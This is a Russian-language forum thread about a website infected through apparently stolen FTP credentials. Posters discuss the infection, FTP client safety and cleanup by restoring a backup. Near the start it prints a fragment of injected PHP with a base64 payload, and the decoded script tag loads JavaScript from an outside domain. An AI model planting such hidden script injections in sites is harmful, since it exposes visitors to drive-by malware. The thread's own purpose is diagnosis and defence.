вредный код

$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2wtd2lzZS5jby5qcC9zdXBlci1qc2Evcm9nb19tbGQucGhwID48L3NjcmlwdD4='),'',

вот расшифровка
<script src=http://l-wise.co.jp/super-jsa/rogo_mld.php ></script>
делайте выводы

Японцы... Знаком с этим случаем... тоже посоветовал проверять комп...
От себя посоветую не использовать частоиспользуемые FTP клиенты (расчёт на массовость)
"Советуем пользоваться sftp-клиентом WinSCP, скачать можно по ссылке:

http://winscp.net/eng/download.php" - именно так я писал в блоге хостинга, жаль что мало кто прислушивается. Я могу попробовать вычистить код автоматизированными средствами (Благо они есть), но средства пока не опробованны, и может затереть весь акк. Ищи скрипт который прописывает всю эту шляпу, хотя сам щас тоже посмотрю, наверняка известно время изменения файлов.

UPD: ТС уже видимо бэкап залил, или вычистил... ничего не нашло

15 да я снес все и восстановил бек ап за 1 число. блог я читал. и не пользуюсь сервисами. я тоталом пользуюсь хотя и WinSCP скачал. не удобно не привычно скорее всего. комп вчера проверял каспером (почистил) после чистки сменил пароль и удалил все лишне файлов перед ном проверил все было норм. утром проверил 171 зараженный файл.

16, тотал коммандер небезопасно хранит пароли ftp

17 а что надежно?

флешХП без установки на пк...портабл версия

возможно это и вирус, советую почистить комп и поменять все пароли от фтп

16, дык тотал коммандер - рекордсмен среди фтп-менеджеров по количеству троянов для него
а у кого-нибудь еще есть фтп-доступ к сайтам?

21 нет только у меня. вроде проблема решена. ща сканю.

А ведь действительно...какой вредный код-то))
А тому кто писал зц - ушки оторви то